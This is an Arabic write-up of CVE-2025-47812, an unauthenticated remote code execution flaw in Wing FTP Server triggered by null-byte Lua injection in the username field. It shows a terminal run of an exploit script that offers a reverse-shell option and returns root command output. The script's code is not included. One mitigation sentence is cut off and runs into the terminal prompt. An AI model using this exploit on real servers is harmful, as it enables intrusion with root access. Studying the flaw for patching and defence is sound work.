
CVE-2025-47812
CVE-2025-47812 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة تؤثر على إصدارات Wing FTP Server السابقة للإصدار 7.4.4. تم اكتشافها بواسطة باحث أمني وتم التأكيد على أنها تُستغل بنشاط في البيئات الفعلية.
تكمن الثغرة في منطق المصادقة في Wing FTP Server، وتحديدًا في طريقة تعامله مع البايتات الفارغة (\0) في معامل username.
يمكن للمهاجمين حقن أكواد Lua عشوائية عبر حقل اسم المستخدم، ويقوم الخادم بكتابتها في ملف الجلسة. وعند معالجة ملف الجلسة لاحقًا، يتم تنفيذ كود Lua المحقون، مما يسمح للمهاجمين بتشغيل أوامر على مستوى النظام.
/loginok.html لشبكات غير موثوقة.┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
هذا الاستغلال مُقدَّم لأغراض تعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.